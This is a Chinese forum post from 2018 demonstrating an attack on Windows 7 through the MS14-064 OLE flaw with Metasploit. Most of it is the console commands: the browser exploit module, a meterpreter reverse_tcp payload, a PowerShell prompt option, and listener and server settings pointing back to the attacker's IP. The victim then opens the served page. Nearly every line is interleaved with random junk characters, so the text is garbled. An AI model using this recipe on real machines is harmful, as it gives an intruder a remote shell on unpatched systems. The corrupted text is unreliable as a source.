找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1419|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( h) w) z/ K" h: e7 |: e 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示2 C* h$ C: X$ p9 F% [( T& ~7 ~: t

+ L; ]9 A5 N& }. o- d' O

8 G8 L9 _+ B2 ]7 u; K( G8 W 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 9 ?/ F" b" X+ S

9 [6 L# u6 ]7 P$ Q; E8 y5 i: X: L5 J2 V

% m9 Q' _1 P- C. G3 n+ `, }- o 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp $ g- P+ q0 F4 t* y5 ~: Y0 c# o* B# E- \

: B( c5 u( p( O3 W) z$ @$ d4 M

& |7 M& ?. z; o/ i, Y2 ~             set AllowPowershellPrompt true/ x2 f9 a; n. d) L

6 j+ E* R8 V6 u8 J1 x9 I

) ^ e1 o! x/ M* G+ r2 R; @             Set LHOST 192.168.0.109 4 a- u& {. t1 e; P- N! j

) C+ t( q" H1 L3 Z1 v: i

4 W- M/ D2 a4 h& g G5 v5 y+ e6 z0 g2 {             set SRVHOST 192.168.0.109 ; V4 v2 m- A- T( ?8 Y! L6 J1 R4 i1 K

9 w% f& v2 H9 M- A1 g2 Y

% W: d! `, A0 y: L: a             Set uripath share4 q: g# \) ^ B0 B- A; ~' X6 A

: t3 ~' d2 H- Y

, R% T9 ]3 e, a0 A2 I# e             Set srvport 80 " n2 J" M; u/ [/ b( I8 ^

; b' f) X7 i2 f0 T, ?

4 y+ H/ z7 |) a9 P4 X1 n! E9 M: D7 F   * |% x/ Q V' l& \; p6 @

2 a5 }7 p; p. t ~1 B

+ U7 I3 ~2 R: \3 I   ! S- i2 i t% e$ F% ]

; Z# N( V* ~: O

# F5 U9 N2 z2 \4 P  3 }* i# R @. n4 j, [$ m; R

- T- s2 ]- c8 W5 \: K2 O% K

6 ~4 Y: A6 W- w' w+ P" ? A+ f   ( } @ N) m" r% O0 G

8 o0 {" \' G0 i1 u/ k

' ?# i- @5 J8 O9 M  1 Q ^2 s- |+ N- j/ B

' t7 o' m, U# t: U

0 X# | z' Z4 l! a( d* l 下面我们来访问本地地址如图:- K5 d$ h3 p6 [4 @9 E4 w f

: w. D( h5 Y. e6 v6 R' q4 D3 t

! J ]9 E, y- @! m   - Z9 J( L/ n) S4 I( S

, j1 ]5 Y4 \! S2 F

5 C( F! h. ]/ R* {: P   ! X8 n4 Y) W+ k, }, U; @

& E8 K. @# p1 ?5 x# d# Y4 N

9 {% X# p- u- W2 s+ G ; A( j# v( a. J" z. U( p y" C

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表